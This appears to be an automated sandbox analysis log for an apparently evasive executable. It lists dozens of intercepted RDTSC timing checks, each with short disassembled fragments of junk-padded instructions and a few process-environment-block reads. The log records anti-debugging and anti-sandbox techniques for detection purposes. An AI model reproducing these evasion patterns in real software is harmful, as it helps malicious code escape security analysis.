Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BA6214 second address: BA621F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA6CC859EC6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BA621F second address: BA622B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jl 00007FA6CD35B916h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BA5CBE second address: BA5CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BA5E1F second address: BA5E3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FA6CD35B916h 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BA5E3A second address: BA5E44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA6CC859EC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BA5E44 second address: BA5E48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BB7910 second address: BB7916 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BB7916 second address: BB791C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BB746E second address: BB7474 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BB7474 second address: BB7482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FA6CD35B918h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BB7482 second address: BB749E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6CC859ED6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BBA183 second address: BBA199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FA6CD35B91Dh 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BBA199 second address: BBA1B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FA6CC859ED3h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BBA1B2 second address: BBA1B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BBFE4C second address: BBFE52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BC8C5F second address: BC8C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BC8C63 second address: BC8C80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA6CC859ED3h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BC8AC4 second address: BC8AD8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA6CD35B916h 0x00000008 jg 00007FA6CD35B916h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BC8AD8 second address: BC8AE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ECAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BCBC29 second address: BCBC40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA6CD35B91Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BD2A17 second address: BD2A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BD1431 second address: BD1451 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6CD35B928h 0x00000009 popad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BD16F1 second address: BD1702 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA6CC859ECCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BD19F0 second address: BD19F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BD19F7 second address: BD19FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BD1B55 second address: BD1B7A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FA6CD35B916h 0x00000009 jmp 00007FA6CD35B928h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BD4007 second address: BD402D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007FA6CC859ECBh 0x0000000a pushad 0x0000000b jno 00007FA6CC859EC6h 0x00000011 push edi 0x00000012 pop edi 0x00000013 jng 00007FA6CC859EC6h 0x00000019 push eax 0x0000001a pop eax 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BD402D second address: BD4031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BD4031 second address: BD4048 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA6CC859EC6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007FA6CC859EC6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BD4048 second address: BD405D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B921h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BD405D second address: BD406D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FA6CC859EC6h 0x0000000a jne 00007FA6CC859EC6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BD406D second address: BD4071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BD7153 second address: BD7159 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BD6E3D second address: BD6E41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BD6E41 second address: BD6E66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ECBh 0x00000007 jmp 00007FA6CC859ECEh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007FA6CC859EC6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: BD6E66 second address: BD6E92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CD35B925h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a pushad 0x0000000b jmp 00007FA6CD35B91Eh 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: C150EA second address: C150F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: C150F0 second address: C1510B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6CD35B927h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: C1510B second address: C15114 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: C15114 second address: C1511A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: C1511A second address: C1513A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FA6CC859ED4h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: C1513A second address: C15152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6CD35B920h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: C15152 second address: C15159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: C175A1 second address: C175A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CEDEBA second address: CEDEDD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FA6CC859ED4h 0x0000000c jg 00007FA6CC859EC6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CEDEDD second address: CEDEF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA6CD35B921h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CEDEF6 second address: CEDEFB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CEDEFB second address: CEDF01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CEE45C second address: CEE462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CEE462 second address: CEE46B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CEE46B second address: CEE475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA6CC859EC6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CEE5C5 second address: CEE5CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CEE5CE second address: CEE5D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CEE5D4 second address: CEE5D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CEE5D8 second address: CEE5E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CEE5E1 second address: CEE5F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CEE5F0 second address: CEE5F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CEE5F4 second address: CEE621 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA6CD35B91Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FA6CD35B925h 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CF2B2C second address: CF2B32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CF4422 second address: CF4433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA6CD35B91Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CF5E8F second address: CF5E93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: CF5E93 second address: CF5E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE001E second address: 6FE0022 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0022 second address: 6FE0028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0028 second address: 6FE0054 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ECEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA6CC859ED7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0054 second address: 6FE006C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6CD35B924h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE006C second address: 6FE0070 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0070 second address: 6FE00E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FA6CD35B91Eh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FA6CD35B920h 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 jmp 00007FA6CD35B91Eh 0x0000001c movzx esi, bx 0x0000001f popad 0x00000020 mov eax, dword ptr fs:[00000030h] 0x00000026 pushad 0x00000027 call 00007FA6CD35B923h 0x0000002c pushad 0x0000002d popad 0x0000002e pop eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007FA6CD35B925h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE00E1 second address: 6FE012C instructions: 0x00000000 rdtsc 0x00000002 mov edx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 sub esp, 18h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FA6CC859ECFh 0x00000013 sbb al, FFFFFFAEh 0x00000016 jmp 00007FA6CC859ED9h 0x0000001b popfd 0x0000001c jmp 00007FA6CC859ED0h 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE012C second address: 6FE0133 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0133 second address: 6FE0199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 jmp 00007FA6CC859ED6h 0x0000000d mov dword ptr [esp], ebx 0x00000010 jmp 00007FA6CC859ED0h 0x00000015 mov ebx, dword ptr [eax+10h] 0x00000018 jmp 00007FA6CC859ED0h 0x0000001d xchg eax, esi 0x0000001e pushad 0x0000001f mov di, ax 0x00000022 push esi 0x00000023 mov al, bh 0x00000025 pop eax 0x00000026 popad 0x00000027 push eax 0x00000028 jmp 00007FA6CC859ED0h 0x0000002d xchg eax, esi 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0199 second address: 6FE019D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE019D second address: 6FE01BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ED9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE01BA second address: 6FE01CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA6CD35B91Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE01CA second address: 6FE0212 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ECBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov esi, dword ptr [756006ECh] 0x00000011 jmp 00007FA6CC859ED6h 0x00000016 test esi, esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FA6CC859ED7h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0212 second address: 6FE0218 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0218 second address: 6FE021C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE021C second address: 6FE02A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FA6CD35C901h 0x0000000e jmp 00007FA6CD35B927h 0x00000013 xchg eax, edi 0x00000014 pushad 0x00000015 movzx ecx, bx 0x00000018 mov bh, FCh 0x0000001a popad 0x0000001b push eax 0x0000001c jmp 00007FA6CD35B923h 0x00000021 xchg eax, edi 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FA6CD35B924h 0x00000029 or esi, 3F089288h 0x0000002f jmp 00007FA6CD35B91Bh 0x00000034 popfd 0x00000035 popad 0x00000036 call dword ptr [755D0B60h] 0x0000003c mov eax, 7696E5E0h 0x00000041 ret 0x00000042 pushad 0x00000043 call 00007FA6CD35B91Bh 0x00000048 mov bx, si 0x0000004b pop eax 0x0000004c mov ch, bh 0x0000004e popad 0x0000004f push 00000044h 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE02A8 second address: 6FE02AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE02AE second address: 6FE02B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE02B4 second address: 6FE02B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE02B8 second address: 6FE02FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FA6CD35B91Bh 0x00000012 or ah, FFFFFFDEh 0x00000015 jmp 00007FA6CD35B929h 0x0000001a popfd 0x0000001b call 00007FA6CD35B920h 0x00000020 pop esi 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE02FF second address: 6FE0305 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0305 second address: 6FE0309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0309 second address: 6FE037D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA6CC859ECAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c pushad 0x0000000d mov edi, 04228420h 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007FA6CC859ED6h 0x00000019 xchg eax, edi 0x0000001a jmp 00007FA6CC859ED0h 0x0000001f push dword ptr [eax] 0x00000021 pushad 0x00000022 call 00007FA6CC859ECEh 0x00000027 mov di, si 0x0000002a pop esi 0x0000002b mov ecx, edi 0x0000002d popad 0x0000002e mov eax, dword ptr fs:[00000030h] 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FA6CC859ED4h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE037D second address: 6FE0393 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA6CD35B921h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2OJYjm4J1B.exeRDTSC instruction interceptor: First address: 6FE0410 second address: 6FE0416 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
